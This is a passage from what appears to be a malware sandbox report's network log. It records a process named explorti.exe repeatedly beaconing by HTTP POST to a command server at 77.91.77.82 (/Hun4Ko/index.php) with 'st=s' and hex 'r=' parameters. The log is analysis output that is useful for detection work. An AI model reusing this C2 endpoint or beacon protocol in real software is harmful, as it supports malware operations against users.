                    Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 35 32 45 37 35 42 34 35 44 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                    Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7EB52E75B45D82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                    Jul 5, 2024 05:10:35.455430031 CEST | 196 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 05 Jul 2024 03:10:35 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    30 | 192.168.2.4 | 49767 | 77.91.77.82 | 80 | 8152 | C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Jul 5, 2024 05:10:35.567018986 CEST | 151 | OUT | POST /Hun4Ko/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 77.91.77.82
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Jul 5, 2024 05:10:36.296036005 CEST | 219 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 05 Jul 2024 03:10:36 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Jul 5, 2024 05:10:36.296833992 CEST | 303 | OUT | POST /Hun4Ko/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 77.91.77.82
                    Content-Length: 154
                    Cache-Control: no-cache
                    Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 35 32 45 37 35 42 34 35 44 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                    Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7EB52E75B45D82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                    Jul 5, 2024 05:10:36.525865078 CEST | 196 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 05 Jul 2024 03:10:36 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    31 | 192.168.2.4 | 49768 | 77.91.77.82 | 80 | 8152 | C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Jul 5, 2024 05:10:36.644284964 CEST | 151 | OUT | POST /Hun4Ko/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 77.91.77.82
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Jul 5, 2024 05:10:37.352226019 CEST | 219 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 05 Jul 2024 03:10:37 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Jul 5, 2024 05:10:37.355459929 CEST | 303 | OUT | POST /Hun4Ko/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 77.91.77.82
                    Content-Length: 154
                    Cache-Control: no-cache
                    Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 35 32 45 37 35 42 34 35 44 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                    Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7EB52E75B45D82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                    Jul 5, 2024 05:10:37.576417923 CEST | 196 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 05 Jul 2024 03:10:37 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    32 | 192.168.2.4 | 49769 | 77.91.77.82 | 80 | 8152 | C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Jul 5, 2024 05:10:37.696398973 CEST | 151 | OUT | POST /Hun4Ko/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 77.91.77.82
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Jul 5, 2024 05:10:38.414021015 CEST | 219 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 05 Jul 2024 03:10:38 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Jul 5, 2024 05:10:38.414747000 CEST | 303 | OUT | POST /Hun4Ko/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 77.91.77.82
                    Content-Length: 154
                    Cache-Control: no-cache
                    Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 35 32 45 37 35 42 34 35 44 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                    Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7EB52E75B45D82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                    Jul 5, 2024 05:10:38.641179085 CEST | 196 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 05 Jul 2024 03:10:38 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    33 | 192.168.2.4 | 49770 | 77.91.77.82 | 80 | 8152 | C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Jul 5, 2024 05:10:38.754026890 CEST | 151 | OUT | POST /Hun4Ko/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 77.91.77.82
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Jul 5, 2024 05:10:39.447379112 CEST | 219 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 05 Jul 2024 03:10:39 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Jul 5, 2024 05:10:39.448174953 CEST | 303 | OUT | POST /Hun4Ko/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 77.91.77.82
                    Content-Length: 154
                    Cache-Control: no-cache
                    Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 35 32 45 37 35 42 34 35 44 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                    Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7EB52E75B45D82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                    Jul 5, 2024 05:10:39.665680885 CEST | 196 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 05 Jul 2024 03:10:39 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    34 | 192.168.2.4 | 49771 | 77.91.77.82 | 80 | 8152 | C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Jul 5, 2024 05:10:39.785593033 CEST | 151 | OUT | POST /Hun4Ko/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 77.91.77.82
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Jul 5, 2024 05:10:40.485183001 CEST | 219 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 05 Jul 2024 03:10:40 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Jul 5, 2024 05:10:40.486037016 CEST | 303 | OUT | POST /Hun4Ko/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 77.91.77.82
                    Content-Length: 154
                    Cache-Control: no-cache
                    Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 35 32 45 37 35 42 34 35 44 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                    Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7EB52E75B45D82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                    Jul 5, 2024 05:10:40.705621958 CEST | 196 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 05 Jul 2024 03:10:40 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    35 | 192.168.2.4 | 49772 | 77.91.77.82 | 80 | 8152 | C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Jul 5, 2024 05:10:40.816066027 CEST | 151 | OUT | POST /Hun4Ko/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 77.91.77.82
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Jul 5, 2024 05:10:41.529180050 CEST | 219 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 05 Jul 2024 03:10:41 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Jul 5, 2024 05:10:41.529983044 CEST | 303 | OUT | POST /Hun4Ko/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 77.91.77.82
                    Content-Length: 154
                    Cache-Control: no-cache
                    Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 35 32 45 37 35 42 34 35 44 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                    Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7EB52E75B45D82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                    Jul 5, 2024 05:10:41.756166935 CEST | 196 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 05 Jul 2024 03:10:41 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    36 | 192.168.2.4 | 49773 | 77.91.77.82 | 80 | 8152 | C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Jul 5, 2024 05:10:41.863178015 CEST | 151 | OUT | POST /Hun4Ko/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 77.91.77.82
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Jul 5, 2024 05:10:42.580399036 CEST | 219 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 05 Jul 2024 03:10:42 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Jul 5, 2024 05:10:42.589514017 CEST | 303 | OUT | POST /Hun4Ko/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 77.91.77.82
                    Content-Length: 154
                    Cache-Control: no-cache
                    Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 35 32 45 37 35 42 34 35 44 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                    Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7EB52E75B45D82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                    Jul 5, 2024 05:10:42.817280054 CEST | 196 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 05 Jul 2024 03:10:42 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    37 | 192.168.2.4 | 49774 | 77.91.77.82 | 80 | 8152 | C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Jul 5, 2024 05:10:42.925442934 CEST | 151 | OUT | POST /Hun4Ko/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 77.91.77.82
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Jul 5, 2024 05:10:43.627463102 CEST | 219 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 05 Jul 2024 03:10:43 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Jul 5, 2024 05:10:43.631434917 CEST | 303 | OUT | POST /Hun4Ko/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 77.91.77.82
                    Content-Length: 154
                    Cache-Control: no-cache
                    Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 35 32 45 37 35 42 34 35 44 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                    Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7EB52E75B45D82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                    Jul 5, 2024 05:10:43.849529028 CEST | 196 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 05 Jul 2024 03:10:43 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    38 | 192.168.2.4 | 49775 | 77.91.77.82 | 80 | 8152 | C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Jul 5, 2024 05:10:43.972579956 CEST | 151 | OUT | POST /Hun4Ko/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 77.91.77.82
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Jul 5, 2024 05:10:44.682857990 CEST | 219 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 05 Jul 2024 03:10:44 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Jul 5, 2024 05:10:44.685906887 CEST | 303 | OUT | POST /Hun4Ko/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 77.91.77.82
                    Content-Length: 154
                    Cache-Control: no-cache
                    Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 35 32 45 37 35 42 34 35 44 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                    Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7EB52E75B45D82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                    Jul 5, 2024 05:10:44.909461021 CEST | 196 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 05 Jul 2024 03:10:44 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    39 | 192.168.2.4 | 49776 | 77.91.77.82 | 80 | 8152 | C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Jul 5, 2024 05:10:45.021903992 CEST | 151 | OUT | POST /Hun4Ko/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 77.91.77.82
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Jul 5, 2024 05:10:45.722275019 CEST | 219 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 05 Jul 2024 03:10:45 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Jul 5, 2024 05:10:45.723231077 CEST | 303 | OUT | POST /Hun4Ko/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 77.91.77.82
                    Content-Length: 154
                    Cache-Control: no-cache
                    Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 35 32 45 37 35 42 34 35 44 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                    Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7EB52E75B45D82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                    Jul 5, 2024 05:10:45.944767952 CEST | 196 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 05 Jul 2024 03:10:45 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    40 | 192.168.2.4 | 49777 | 77.91.77.82 | 80 | 8152 | C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Jul 5, 2024 05:10:46.066132069 CEST | 151 | OUT | POST /Hun4Ko/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 77.91.77.82
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Jul 5, 2024 05:10:46.802546978 CEST | 219 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 05 Jul 2024 03:10:46 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Jul 5, 2024 05:10:46.803257942 CEST | 303 | OUT | POST /Hun4Ko/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 77.91.77.82
                    Content-Length: 154
                    Cache-Control: no-cache
                    Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 35 32 45 37 35 42 34 35 44 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                    Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7EB52E75B45D82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                    Jul 5, 2024 05:10:47.033916950 CEST | 196 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 05 Jul 2024 03:10:46 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    41 | 192.168.2.4 | 49778 | 77.91.77.82 | 80 | 8152 | C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Jul 5, 2024 05:10:47.144500017 CEST | 151 | OUT | POST /Hun4Ko/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 77.91.77.82
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Jul 5, 2024 05:10:47.857371092 CEST | 219 | IN | HTTP/1.1 200 OK
